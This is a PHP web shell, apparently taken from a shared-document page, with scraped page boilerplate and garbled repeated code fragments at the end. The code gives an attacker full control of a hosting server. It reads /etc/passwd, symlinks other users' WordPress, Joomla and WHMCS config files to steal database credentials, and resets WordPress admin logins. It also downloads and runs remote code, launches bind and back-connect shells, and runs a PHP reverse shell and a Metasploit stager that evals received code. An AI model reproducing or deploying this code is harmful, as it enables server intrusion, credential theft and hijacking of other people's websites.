".$sqlport."' /><input type='hidden' name='sqlpass' value='".$sqlpass."' /><inpu
t type='hidden' name='db' value='".$db."' /><p><textarea name='sqlquery' class='
output' style='width:98%;height:80px;'>".$query."</textarea></p><p><input class=
'inputzbut' style='width:80px;' name='submitquery' type='submit' value='Go !' />
</p></form></div> ";$dbs = array();$msg .= "<table class='explore' style='width:
99%;'><tr><th>available databases</th></tr>";$hasil = @mysql_list_dbs($con);
while(list($db) = @mysql_fetch_row($hasil)){@array_push($dbs,$db);} @sort($dbs);
foreach($dbs as $db){
$msg .= "<tr><td><a href='?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&s
qluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$
db."'>$db</a></td></tr>";} $msg .= "</table>";}
@mysql_close($con);} else $msg = "<p style='text-align:center;'>can't connect</p
>";echo $msg;} else{?>
<br><center><div class="mybox"><h2 class="k2ll33d2">MySQL Connect</h2><form acti
on="?" method="get"><input type="hidden" name="y" value="<?php echo $pwd;?>" />
<input type="hidden" name="x" value="mysql" /><table class="tabnet" style="width
:300px;"> <tr><th colspan="2">Connection Form</th></tr> <tr><td>  Host
</td><td><input style="width:220px;" class="inputz" type="text" name="sqlhost" v
alue="localhost" /></td></tr> <tr><td>  Username</td><td><input style=
"width:220px;" class="inputz" type="text" name="sqluser" value="root" /></td></t
r> <tr><td>  Password</td><td><input style="width:220px;" class="input
z" type="text" name="sqlpass" value="password" /></td></tr> <tr><td>
Port</td><td><input style="width:80px;" class="inputz" type="text" name="sqlport
" value="3306" /> <input style="width:19%;" class="inputzbut" type="submit"
value="Go !" name="submitsql" /></td></tr></table></form></div></center>
<?php }}
elseif(isset($_GET['x']) && ($_GET['x'] == 'configs')) {?><br><br><center><div c
lass='mybox'><?php if (empty($_POST['conf'])) { ?><h2 class='k2ll33d2'>Configs G
rabber</h2><br><p>/etc/passwd content</p><form method="POST"><textarea name="pas
swd" class='output' rows=20><?php echo file_get_contents('/etc/passwd'); ?></tex
tarea><br><br><input name="conf" class='inputzbut' size="80" value="GET'em" type
="submit"><br></form></div></center><?php }if ($_POST['conf']) {$function = $fun

ctions=@ini_get("disable_functions");if(eregi("symlink",$functions)){die ('<erro
r>Symlink is disabled :( </error>');}@mkdir('configs', 0755);@chdir('configs');$
htaccess="
Options all
Options +Indexes
Options +FollowSymLinks
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any
";file_put_contents(".htaccess",$htaccess,FILE_APPEND);$passwd=$_POST["passwd"];
$passwd=explode("\n",$passwd);echo "<center class='k2ll33d2'>wait ...<center>";f
oreach($passwd as $pwd){$pawd=explode(":",$pwd);$user =$pawd[0];@symlink('/home/
'.$user.'/public_html/wp-config.php',$user.'-wp13.txt');@symlink('/home/'.$user.
'/public_html/wp/wp-config.php',$user.'-wp13-wp.txt');@symlink('/home/'.$user.'/
public_html/WP/wp-config.php',$user.'-wp13-WP.txt');@symlink('/home/'.$user.'/pu
blic_html/wp/beta/wp-config.php',$user.'-wp13-wp-beta.txt');@symlink('/home/'.$u
ser.'/public_html/beta/wp-config.php',$user.'-wp13-beta.txt');@symlink('/home/'.
$user.'/public_html/press/wp-config.php',$user.'-wp13-press.txt');@symlink('/hom
e/'.$user.'/public_html/wordpress/wp-config.php',$user.'-wp13-wordpress.txt');@s
ymlink('/home/'.$user.'/public_html/Wordpress/wp-config.php',$user.'-wp13-Wordpr
ess.txt');@symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-wp13
-Wordpress.txt');@symlink('/home/'.$user.'/public_html/wordpress/beta/wp-config.
php',$user.'-wp13-wordpress-beta.txt');@symlink('/home/'.$user.'/public_html/new
s/wp-config.php',$user.'-wp13-news.txt');@symlink('/home/'.$user.'/public_html/n
ew/wp-config.php',$user.'-wp13-new.txt');@symlink('/home/'.$user.'/public_html/b
log/wp-config.php',$user.'-wp-blog.txt');@symlink('/home/'.$user.'/public_html/b
eta/wp-config.php',$user.'-wp-beta.txt');@symlink('/home/'.$user.'/public_html/b
logs/wp-config.php',$user.'-wp-blogs.txt');@symlink('/home/'.$user.'/public_html
/home/wp-config.php',$user.'-wp-home.txt');@symlink('/home/'.$user.'/public_html
/protal/wp-config.php',$user.'-wp-protal.txt');@symlink('/home/'.$user.'/public_
html/site/wp-config.php',$user.'-wp-site.txt');@symlink('/home/'.$user.'/public_
html/main/wp-config.php',$user.'-wp-main.txt');@symlink('/home/'.$user.'/public_
html/test/wp-config.php',$user.'-wp-test.txt');@symlink('/home/'.$user.'/public_
html/joomla/configuration.php',$user.'-joomla2.txt');@symlink('/home/'.$user.'/p
ublic_html/protal/configuration.php',$user.'-joomla-protal.txt');@symlink('/home
/'.$user.'/public_html/joo/configuration.php',$user.'-joo.txt');@symlink('/home/
'.$user.'/public_html/cms/configuration.php',$user.'-joomla-cms.txt');@symlink('
/home/'.$user.'/public_html/site/configuration.php',$user.'-joomla-site.txt');@s
ymlink('/home/'.$user.'/public_html/main/configuration.php',$user.'-joomla-main.
txt');@symlink('/home/'.$user.'/public_html/news/configuration.php',$user.'-joom
la-news.txt');@symlink('/home/'.$user.'/public_html/new/configuration.php',$user
.'-joomla-new.txt');@symlink('/home/'.$user.'/public_html/home/configuration.php
',$user.'-joomla-home.txt');@symlink('/home/'.$user.'/public_html/vb/includes/co
nfig.php',$user.'-vb-config.txt');@symlink('/home/'.$user.'/public_html/whm/conf
iguration.php',$user.'-whm15.txt');@symlink('/home/'.$user.'/public_html/central
/configuration.php',$user.'-whm-central.txt');@symlink('/home/'.$user.'/public_h
tml/whm/whmcs/configuration.php',$user.'-whm-whmcs.txt');@symlink('/home/'.$user
.'/public_html/whm/WHMCS/configuration.php',$user.'-whm-WHMCS.txt');@symlink('/h
ome/'.$user.'/public_html/whmc/WHM/configuration.php',$user.'-whmc-WHM.txt');@sy
mlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-whmcs.txt');
@symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-support
.txt');@symlink('/home/'.$user.'/public_html/configuration.php',$user.'-joomla.t
xt');@symlink('/home/'.$user.'/public_html/submitticket.php',$user.'-whmcs2.txt'
);@symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-whm.txt')
;}echo 'Done -> <a href="configs">configs</a>';}}
elseif(isset($_GET['x']) && ($_GET['x'] == 'config')){ error_reporting(0);if ($_

POST['kill']) {$url = $_POST['url'];$user = $_POST['user'];$pass =$_POST['pass']
;$pss = md5($pass);function enter($text,$a,$b){$explode = explode($a,$text);$exp
lode = explode($b,$explode[1]);return $explode[0];}$config = file_get_contents($
url);$password = enter($config,"define('DB_PASSWORD', '","');");$username = en
ter($config,"define('DB_USER', '","');");$db = enter($config,"define('DB_NAME',
'","');");$prefix = enter($config,'$table_prefix = \'',"';");$host = enter($
config,"define('DB_HOST', '","');");if($config && preg_match('/DB_NAME/i',$confi
g)){$conn= @mysql_connect($host,$username ,$password ) or die ("i can't connect
to mysql, check your data");@mysql_select_db($db,$conn) or die (mysql_error());$
grab = @mysql_query("SELECT * from `wp_options` WHERE option_name='home'");$dat
a = @mysql_fetch_array($grab);$site_url = $data["option_value"];$query = mysql_q
uery("UPDATE `".$prefix."users` SET ùser_login` = '".$user."',ùser_pass` = '".
$pss."' WHERE ÌD` = 1");if ($query) {echo '<center><h2 class="k2ll33d2">Done !<
/h2></center><br><table width="100%"><tr><th width="20%">site</th><th width="20%
">user</th><th with="20%">password</th><th width="20%">link</th></tr><tr><td wid
th="20%"><font size="2" color="red">'.$site_url.'</font></td><td width="20%">'.$
user.'</td><td with="20%">'.$pass.'</td><td width="20%"><a href="'.$site_url.'/w
p-login.php"><font color="#00ff00">login</font></td></tr></table>';} else echo '
<h2 class="k2ll33d2"><font color="#ff0000">ERROR !</font></h2>';} else die('<h2
class="k2ll33d2">Not a wordpress config</h2>');} else { ?> <center><br><br><div
class="mybox"><form method="post"><h2 style='font-size:26px;' class='k2ll33d2'>W
ordpress login changer ( symlink version )</h2><br><table><tr><td>config link&nb
sp;: </td><td><input size="26" class="inputz" type="text" name="url" value=
""></td></tr><tr><td>new user : </td><td><input class="inputz" type="t
ext" name="user" size="26" value="admin"></td></tr><tr><td>new password :&n
bsp;</td><td><input class="inputz" type="text" size="26" name="pass" value="1231
23"></td></tr><tr><td><br></td></tr><tr><td><input class="inputzbut" type="submi
t" name="kill" value=" change "></td><br></tr></table></form></div></center><?ph
p }}
elseif(isset($_GET['x']) && ($_GET['x'] == 'domains')){echo "<br><br><center><di
v class='mybox'><p align='center' class='k2ll33d2'>Domains and Users</p>";$d0mai
ns = @file("/etc/named.conf");if(!$d0mains){die("<center>Error : i can't read [
/etc/named.conf ]</center>");}echo '<table id="output"><tr bgcolor=#cecece><td>D
omains</td><td>users</td></tr>';foreach($d0mains as $d0main){if(eregi("zone",$d0
main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);flush();if(strlen(trim
($domains[1][0])) > 2){$user = posix_getpwuid(@fileowner("/etc/valiases/".$domai
ns[1][0]));echo "<tr><td><a href=http://www.".$domains[1][0]."/>".$domains[1][0]
."</a></td><td>".$user['name']."</td></tr>";flush();}}}echo'</div></center>';}
elseif(isset($_GET['x']) && ($_GET['x'] == 'keyboard')){if(empty($_POST['pwd']))
{echo "<br><br><center><div class='mybox'><h2 style='font-size:40px;' class='k2l
l33d2'>Wordpress login changer</h2><FORM method='POST'>DB_Prefix : <INPUT class
='inputz' size='8' value='wp_' name='prefix' type='text'>  host : <I
NPUT class ='inputz' size='10' value='localhost' name='localhost' type='text'>&n
bsp; database : <INPUT class ='inputz' size='10' value='Database' name='da
tabase' type='text'>  username : <INPUT class ='inputz' size='10' val
ue='db_user' name='username' type='text'>  password : <INPUT class ='
inputz' size='10' value='db_pass' name='password' type='text'>  <br><b
r>New username : <INPUT class ='inputz' name='admin' size='15' value='k2'><br><
br>New password : <INPUT class ='inputz' name='pwd' size='15' value='123123'><b
r>  <br><INPUT class='inputzbut' value='change' name='send' type='subm
it'></FORM></div/></center>";}else{$prefix = $_POST['prefix'];$localhost = $_POS
T['localhost'];$database= $_POST['database'];$username= $_POST['username'];$pass
word= $_POST['password'];$pwd= $_POST['pwd'];$admin= $_POST['admin'];@mysql_conn
ect($localhost,$username,$password) or die(mysql_error());@mysql_select_db($data
base) or die(mysql_error());$hash = crypt($pwd);$grab = @mysql_query("SELECT * f
rom `".$prefix."options` WHERE option_name='home'");$data = @mysql_fetch_array(
$grab);$site_url=$data["option_value"];$k2=@mysql_query("UPDATE ".$prefix."users
SET user_login ='".$admin."' WHERE ID = 1") or die(mysql_error());$k2=@mysql_qu
ery("UPDATE ".$prefix."users SET user_pass ='".$hash."' WHERE ID = 1") or die(my
sql_error());if($k2){echo '<br><br><center><h1>Done ... -> <a href="'.$site_url.

'/wp-login.php" target="_blank">Login</a></h1></center>';}}echo '</center>';}
elseif(isset($_GET['x']) && ($_GET['x'] == 'string')){$text = $_POST['code'];?><
center><br><br><div class="mybox"><h2 class="k2ll33d2">String encoder</h2><form
method="post"><br><textarea class='inputz' cols=80 rows=5 name="code">k2ll33d</t
extarea><br><br><select class='inputz' size="1" name="ope"><option value="base64
">Base64</option><option value="md5">md5</option><option value="whash">Crypt</op
tion><option value="SHA1">SHA1</option><option value="urlencode">URL Encoding</o
ption><option value="md4">md4</option><option value="SHA256">SHA256</option></se
lect> <input class='inputzbut' type='submit' value='encrypt'></form><?php $
op = $_POST["ope"];switch ($op) {case 'base64': $codi=base64_encode($text);break
;case 'md5' : $codi=md5($text);break;case 'whash' : $codi=crypt($text);break;cas
e 'SHA1' : $codi=sha1($text);break;case 'urlencode' : $codi=urlencode($text);bre
ak;case 'md4' : $codi=hash("md4",$text);break;case 'SHA256' : $codi=hash("sha256
",$text);break;default:break;}echo '<textarea cols=80 rows=10 class="inputz" rea
donly>'.$codi.'</textarea></div></center>';}
elseif(isset($_GET['x']) && ($_GET['x'] == 'phpinfo')){@ob_start();@eval("phpinf
o();");$buff = @ob_get_contents();@ob_end_clean();$awal = strpos($buff,"<body>")
+6;$akhir = strpos($buff,"</body>");echo "<div class='phpinfo'>".substr($buff,$a
wal,$akhir-$awal)."</div>";}
elseif(isset($_GET['view']) && ($_GET['view'] != "")){if(is_file($_GET['view']))
{if(!isset($file))$file = magicboom($_GET['view']);if(!$win && $posix){$name=@po
six_getpwuid(@fileowner($file));$group=@posix_getgrgid(@filegroup($file));$owner
= $name['name']."<span class='gaya'> : </span>".$group['name'];} else {$owner =
$user;}$filn = basename($file);echo "<table style='margin:6px 0 0 2px;line-heig
ht:20px;'> <tr><td>Filename</td><td><span id='".clearspace($filn)."_link'>".$fil
e."</span> <form action='?y=".$pwd."&view=$file' method='post' id='".clearsp
ace($filn)."_form' class='sembunyi' style='margin:0;padding:0;'> <input type='hi
dden' name='oldname' value='".$filn."' style='margin:0;padding:0;' /> <input cla
ss='inputz' style='width:200px;' type='text' name='newname' value='".$filn."' />
<input class='inputzbut' type='submit' name='rename' value='rename' /> <input c
lass='inputzbut' type='submit' name='cancel' value='cancel' onclick='tukar('".cl
earspace($filn)."_link','".clearspace($filn)."_form');' /> </form> </td></tr> <t
r><td>Size</td><td>".ukuran($file)."</td></tr> <tr><td>Permission</td><td>".get_
perms($file)."</td></tr> <tr><td>Owner</td><td>".$owner."</td></tr> <tr><td>Crea
te time</td><td>".date("d-M-Y H:i",@filectime($file))."</td></tr> <tr><td>Last m
odified</td><td>".date("d-M-Y H:i",@filemtime($file))."</td></tr> <tr><td>Last a
ccessed</td><td>".date("d-M-Y H:i",@fileatime($file))."</td></tr> <tr><td>Action
s</td><td><a href='?y=$pwd&edit=$file'>edit</a> | <a href=\"javascript:tukar
('".clearspace($filn)."_link','".clearspace($filn)."_form');\">rename</a> | <a h
ref='?y=$pwd&delete=$file'>delete</a> | <a href='?y=$pwd&dl=$file'>downl
oad</a> (<a href='?y=$pwd&dlgzip=$file'>gzip</a>)</td></tr> <tr><td>Vie
w</td><td><a href='?y=".$pwd."&view=".$file."'>text</a> | <a href='?y=".$pwd
."&view=".$file."&type=code'>code</a> | <a href='?y=".$pwd."&view=".
$file."&type=image'>image</a></td></tr></table>";
if(isset($_GET['type']) && ($_GET['type']=='image')){echo "<div style='text-alig
n:center;margin:8px;'><img src='?y=".$pwd."&img=".$filn."'></div>";}
elseif(isset($_GET['type']) && ($_GET['type']=='code')){echo "<div class='viewfi
le'>";$file = wordwrap(@file_get_contents($file),"240","\n");@highlight_string($
file);echo "</div>";} else {echo "<div class='viewfile'>";echo nl2br(htmlentitie
s((@file_get_contents($file))));echo "</div>";}}elseif(is_dir($_GET['view'])){ec
ho showdir($pwd,$prompt);}}
elseif(isset($_GET['edit']) && ($_GET['edit'] != "")){if(isset($_POST['save'])){
$file = $_POST['saveas'];$content = magicboom($_POST['content']);if($filez = @fo
pen($file,"w")){$time = date("d-M-Y H:i",time());if(@fwrite($filez,$content)) $m
sg = "file saved <span class='gaya'>@</span> ".$time;else $msg = "failed to save
";@fclose($filez);}else $msg = "permission denied";}if(!isset($file))$file = $_G
ET['edit'];if($filez = @fopen($file,"r")){$content = "";
while(!feof($filez)){$content .= htmlentities(str_replace("''","'",fgets($filez)
));}
@fclose($filez);}?><form action="?y=<?php echo $pwd;?>&edit=<?php echo $file

;?>" method="post"> <table class="cmdbox"> <tr><td colspan="2">
<textarea class="output" name="content">
<?php echo $content;?></textarea> <tr>
<td colspan="2">Save as <input onMouseOver="this.focus();" id="cmd" class="input
z" type="text" name="saveas" style="width:60%;" value="<?php echo $file;?>" /><i
nput class="inputzbut" type="submit" value="Save !" name="save" style="width:12%
;" /> <?php echo $msg;?></td></tr></table></form> <?php }
elseif(isset($_GET['x']) && ($_GET['x'] == 'upload')){if(isset($_POST['uploadcom
p'])){if(is_uploaded_file($_FILES['file']['tmp_name'])){$path = magicboom($_POST
['path']);$fname = $_FILES['file']['name'];$tmp_name = $_FILES['file']['tmp_name
'];$pindah = $path.$fname;$stat = @move_uploaded_file($tmp_name,$pindah);if ($st
at) {$msg = "file uploaded to $pindah";} else $msg = "failed to upload $fname";}
else $msg = "failed to upload $fname";}
elseif(isset($_POST['uploadurl'])){$pilihan = trim($_POST['pilihan']);$wurl = tr
im($_POST['wurl']);$path = magicboom($_POST['path']);$namafile = download($pilih
an,$wurl);$pindah = $path.$namafile;if(is_file($pindah)){$msg = "file uploaded t
o $pindah";}else $msg ="failed to upload $namafile";}?><br><br><center><div clas
s="mybox"><form action="?y=<?php echo $pwd;?>&x=upload" enctype="multipart/f
orm-data" method="post"><h1 class="k2ll33d2">Upload Files To The Server</h1><tab
le class="tabnet" style="width:320px;padding:0 1px;"> <tr><th colspan="2">Local<
/th></tr> <tr><td colspan="2"><p style="text-align:center;"><input style="color:
#000000;" type="file" name="file" /> <input type="submit" name="uploadcomp"
class="inputzbut" value="Go" style="width:80px;"></p></td> <tr><td colspan="2">
<input type="text" class="inputz" style="width:99%;" name="path" value="<?php ec
ho $pwd;?>" /></td></tr> </tr> </table></form><br><table class="tabnet" style="w
idth:320px;padding:0 1px;"> <tr><th colspan="2">Remote</th></tr> <tr><td colspan
="2"><form method="post" style="margin:0;padding:0;" actions="?y=<?php echo $pwd
;?>&x=upload"> <table><tr><td>link</td><td><input class="inputz" type="text"
name="wurl" style="width:250px;" value="http://site/file.*"></td></tr> <tr><td
colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" val
ue="<?php echo $pwd;?>" /></td></tr> <tr><td><select size="1" class="inputz" nam
e="pilihan"> <option value="wwget">wget</option> <option value="wlynx">lynx</opt
ion> <option value="wfread">fread</option> <option value="wfetch">fetch</option>
<option value="wlinks">links</option> <option value="wget">GET</option> <option
value="wcurl">curl</option> </select></td><td colspan="2"><input type="submit"
name="uploadurl" class="inputzbut" value="Go" style="width:246px;"></td></tr></f
orm></table></td> </tr> </table> <div style="text-align:center;margin:2px;"><?ph
p echo $msg;?></div></div></center>
<?php }
elseif(isset($_GET['x']) && ($_GET['x'] == 'back')){
if (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass'
]) && ($_POST['use'] == 'C')) {$port = trim($_POST['port']);$passwrd = trim($_PO
ST['bind_pass']);tulis("bdc.c",$port_bind_bd_c);exe("gcc -o bdc bdc.c");exe("chm
od 777 bdc");@unlink("bdc.c");exe("./bdc ".$port." ".$passwrd." &");$scan = exe(
"ps aux");if(eregi("./bdc $por",$scan)){$msg = "<p>Process successed</p>";} else
{$msg = "<p>Process Failed</p>";}}
elseif (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_p
ass']) && ($_POST['use'] == 'Perl')) {$port = trim($_POST['port']);$passwrd = tr
im($_POST['bind_pass']);tulis("bdp",$port_bind_bd_pl);exe("chmod 777 bdp");$p2=w
hich("perl");exe($p2." bdp ".$port." &");$scan = exe("ps aux");if(eregi("$p2 bdp
$port",$scan)){$msg = "<p>Process successed</p>";} else {$msg = "<p>Process Fai
led</p>";} }
elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST
['ip']) && ($_POST['use'] == 'C')) {$ip = trim($_POST['ip']);$port = trim($_POST
['backport']);tulis("bcc.c",$back_connect_c);exe("gcc -o bcc bcc.c");exe("chmod
777 bcc");@unlink("bcc.c");exe("./bcc ".$ip." ".$port." &");$msg = "trying to co
nnect to ".$ip." on port ".$port." ...";}
elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST
['ip']) && ($_POST['use'] == 'Perl')) {
$ip = trim($_POST['ip']);$port = trim($_POST['backport']);tulis("bcp",$back_conn

ect);
exe("chmod +x bcp");$p2=which("perl");exe($p2." bcp ".$ip." ".$port." &");
$msg = "Trying to connect to ".$ip." on port ".$port." ...";}
elseif (isset($_POST['expcompile']) && !empty($_POST['wurl']) && !empty($_POST['
wcmd'])) {$pilihan = trim($_POST['pilihan']);$wurl = trim($_POST['wurl']);$namaf
ile = download($pilihan,$wurl);
if(is_file($namafile)){$msg = exe($wcmd);}
else $msg = "error: file not found $namafile";}?><br><br><br><br> <table class="
tabnet"> <tr><th>Bind Port</th><th>Back connect</th><th>download and Exec</th></
tr><tr><td> <table> <form method="post" actions="?y=<?php echo $pwd;?>&x=bac
k"><tr><td>Port</td><td><input class="inputz" type="text" name="port" size="26"
value="<?php echo $bindport ?>"></td></tr> <tr><td>Password</td><td><input class
="inputz" type="text" name="bind_pass" size="26" value="<?php echo $bindport_pas
s;?>"></td></tr> <tr><td>Use</td><td style="text-align:justify"><p><select class
="inputz" size="1" name="use"><option value="Perl">Perl</option><option value="C
">C</option></select><input class="inputzbut" type="submit" name="bind" value="B
ind" style="width:120px"></td></tr></form></table> </td> <td><table> <form metho
d="post" actions="?y=<?php echo $pwd;?>&x=back"><tr><td>IP</td><td><input cl
ass="inputz" type="text" name="ip" size="26" value="<?php echo ((getenv('REMOTE_
ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1"));?>"></td></tr> <tr><td>Port</
td><td><input class="inputz" type="text" name="backport" size="26" value="<?php
echo $bindport;?>"></td></tr> <tr><td>Use</td><td style="text-align:justify"><p>
<select size="1" class="inputz" name="use"><option value="Perl">Perl</option><op
tion value="C">C</option></select> <input type="submit" name="backconn" value="C
onnect" class="inputzbut" style="width:120px"></td></tr></form></table> </td> <t
d> <table> <form method="post" actions="?y=<?php echo $pwd;?>&x=back"><tr><t
d>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;"
value="www.some-code/exploits.c"></td></tr><tr><td>cmd</td><td><input class="in
putz" type="text" name="wcmd" style="width:250px;" value="gcc -o exploits exploi
ts.c;chmod +x exploits;./exploits;"></td> </tr> <tr><td><select size="1" class="
inputz" name="pilihan"> <option value="wwget">wget</option> <option value="wlynx
">lynx</option> <option value="wfread">fread</option> <option value="wfetch">fet
ch</option> <option value="wlinks">links</option><option value="wget">GET</optio
n> <option value="wcurl">curl</option> </select></td><td colspan="2"><input type
="submit" name="expcompile" class="inputzbut" value="Go" style="width:246px;"></
td></tr></form></table></td></tr></table><div style="text-align:center;margin:2p
x;"><?php echo $msg;?></div><br>
<?php
error_reporting(0);
function ss($t){if (!get_magic_quotes_gpc()) return trim(urldecode($t));return t
rim(urldecode(stripslashes($t)));}
$s_my_ip = $_SERVER['REMOTE_ADDR'];$rsport = "443";$rsportb4 = $rsport;$rstarget
4 = $s_my_ip;$s_result = "<center><div class='mybox' align='center'><td><h2>Reve
rse shell ( php )</h2><form method='post' actions='?y=<?php echo $pwd;?>&x='
back'><table class='myboxtbl'><tr><td style='width:100px;'>Your IP</td><td><inpu
t style='width:100%;' class='inputz' type='text' name='rstarget4' value='".$rsta
rget4."' /></td></tr><tr><td>Port</td><td><input style='width:100%;' class='inpu
tz' type='text' name='sqlportb4' value='".$rsportb4."' /></td></tr></table><inpu
t type='submit' name='xback_php' class='inputzbut' value='connect' style='width:
120px;height:30px;margin:10px 2px 0 2px;' /><input type='hidden' name='d' value=
'".$pwd."' /></form></td></div><br><div class='mybox'><td><form method='POST'><t
able class='myboxtbl'><h2>Metasploit Connection </h2><tr><td style='width:100px;
'>Your IP</td><td><input style='width:100%;' class='inputz' type='text' size='40
' name='yip' value='".$my_ip."' /></td></tr><tr><td>Port</td><td><input style='w
idth:100%;' class='inputz' type='text' size='5' name='yport' value='443' /></td>
</tr></table><input class='inputzbut' type='submit' value='Connect' name='metaCo
nnect' style='width:120px;height:30px;margin:10px 2px 0 2px;'></form></td></div>
</center>";
echo $s_result;
if($_POST['metaConnect']){$ipaddr = $_POST['yip'];$port = $_POST['yport'];if ($i

p == "" && $port == ""){echo "fill in the blanks";}else {if (FALSE !== strpos($i
paddr, ":")) {$ipaddr = "[". $ipaddr ."]";}if (is_callable('stream_socket_client
')){$msgsock = stream_socket_client("tcp://{$ipaddr}:{$port}");if (!$msgsock){di
e();}$msgsock_type = 'stream';}elseif (is_callable('fsockopen')){$msgsock = fsoc
kopen($ipaddr,$port);if (!$msgsock) {die(); }$msgsock_type = 'stream';}elseif (i
s_callable('socket_create')){$msgsock = socket_create(AF_INET, SOCK_STREAM, SOL_
TCP);$res = socket_connect($msgsock, $ipaddr, $port);if (!$res) {die(); }$msgsoc
k_type = 'socket';}else {die();}switch ($msgsock_type){case 'stream': $len = fre
ad($msgsock, 4); break;case 'socket': $len = socket_read($msgsock, 4); break;}if
(!$len) {die();}$a = unpack("Nlen", $len);$len = $a['len'];$buffer = '';while (
strlen($buffer) < $len){switch ($msgsock_type) {case 'stream': $buffer .= fread(
$msgsock, $len-strlen($buffer)); break;case 'socket': $buffer .= socket_read($ms
gsock, $len-strlen($buffer));break;}}eval($buffer);echo "[*] Connection Terminat
ed";die();}}
if(isset($_REQUEST['sqlportb4'])) $rsportb4 = ss($_REQUEST['sqlportb4']);
if(isset($_REQUEST['rstarget4'])) $rstarget4 = ss($_REQUEST['rstarget4']);
if ($_POST['xback_php']) {$ip = $rstarget4;$port = $rsportb4;$chunk_size = 1337;
$write_a = null;$error_a = null;$shell = '/bin/sh';$daemon = 0;$debug = 0;if(fun
ction_exists('pcntl_fork')){$pid = pcntl_fork();
if ($pid == -1) exit(1);if ($pid) exit(0);if (posix_setsid() == -1) exit(1);$dae
mon = 1;}
umask(0);$sock = fsockopen($ip, $port, $errno, $errstr, 30);if(!$sock) exit(1);
$descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => a
rray("pipe", "w"));
$process = proc_open($shell, $descriptorspec, $pipes);
if(!is_resource($process)) exit(1);
stream_set_blocking($pipes[0], 0);
stream_set_blocking($sock, 0);
while(1){if(feof($sock)) break;if(feof($pipes[1])) break;$read_a = array($sock,
$pipes[1], $pipes[2]);$num_changed_sockets = stream_select($read_a, $write_a, $e
rror_a, null);
if(in_array($sock, $read_a)){$input = fread($sock, $chunk_size);fwrite($pipes[0]
, $input);}
if(in_array($pipes[1], $read_a)){$input = fread($pipes[1], $chunk_size);fwrite($
sock, $input);}
if(in_array($pipes[2], $read_a)){$input = fread($pipes[2], $chunk_size);fwrite($
sock, $input);}}fclose($sock);fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[
2]);proc_close($process);$rsres = " ";$s_result .= $rsres;}} elseif(isset($_GET[
'x']) && ($_GET['x'] == 'shell')){?>
<form action="?y=<?php echo $pwd;?>&x=shell" method="post"> <table class="cm
dbox"> <tr><td colspan="2">
<textarea class="output" readonly>
<?php if(isset($_POST['submitcmd'])) {echo @exe($_POST['cmd']);} ?>
</textarea> <tr><td colspan="2"><?php echo $prompt;?><input onMouseOver="this.fo
cus();" id="cmd" class="inputz" type="text" name="cmd" style="width:60%;" value=
"" /><input class="inputzbut" type="submit" value="Do !" name="submitcmd" style=
"width:12%;" /></td></tr> </table></form>
<?php }else{if(isset($_GET['delete']) && ($_GET['delete'] != "")){$file = $_GET[
'delete'];@unlink($file);}
elseif(isset($_GET['fdelete']) && ($_GET['fdelete'] != "")){@rmdir(rtrim($_GET['
fdelete'],DIRECTORY_SEPARATOR));}
elseif(isset($_GET['mkdir']) && ($_GET['mkdir'] != "")){$path = $pwd.$_GET['mkdi
r'];@mkdir($path);}$buff = showdir($pwd,$prompt);echo $buff;}
?></div></body></html>

R PHP PDF

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

R PHP PDF

Uploaded by

Copyright:

Available Formats

<?

else return "???";} function exe($cmd){if(function_exists('system')) {@ob_start(

v class="head_info"> <table width="100%"><tr><td width="23%"><table class="b_tbl

;$dbname = ex($config,'$db = \'',"';");$prefix = ex($config,'$dbprefix = \'',"';

echo "<br><br><center><div class='mybox'><h2 class='k2ll33d2'>server symlinker</

DB_HOST', '","');");$link=mysql_connect($host,$username,$password);if($link) {my

nts($site_url.'/wp-content/themes/'.$template.'/index.php');$cond = 1;}} else {$

, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$hid

($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" targ

t_contents($url.$m);}$domain = $map[$mz[0]];$cls = ($j % 2 == 0) ? 'class="even"

://'.$domain."<br>");$count1++;} else {echo '<td align="center"><span class="red

rt/form-data" method="POST"><div align='center'><span lang='en-us'><b>Defacer&nb

userlist=explode("\n",$users);$passlist=explode("\n",$pass);print "<b>[~] Wait .

($con)." proto ".mysql_get_proto_info($con)."</p>";$msg .= "</div>";echo $msg;if

="submit"><br></form></div></center><?php }if ($_POST['conf']) {$function = $fun

elseif(isset($_GET['x']) && ($_GET['x'] == 'config')){ error_reporting(0);if ($_

sql_error());if($k2){echo '<br><br><center><h1>Done ... -> <a href="'.$site_url.

@fclose($filez);}?><form action="?y=<?php echo $pwd;?>&edit=<?php echo $file

$ip = trim($_POST['ip']);$port = trim($_POST['backport']);tulis("bcp",$back_conn

if($_POST['metaConnect']){$ipaddr = $_POST['yip'];$port = $_POST['yport'];if ($i

You might also like

R PHP PDF

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

R PHP PDF

Uploaded by

Copyright:

Available Formats

<?

else return "???";} function exe($cmd){if(function_exists('system')) {@ob_start(

v class="head_info"> <table width="100%"><tr><td width="23%"><table class="b_tbl

;$dbname = ex($config,'$db = \'',"';");$prefix = ex($config,'$dbprefix = \'',"';

echo "<br><br><center><div class='mybox'><h2 class='k2ll33d2'>server symlinker</

DB_HOST', '","');");$link=mysql_connect($host,$username,$password);if($link) {my

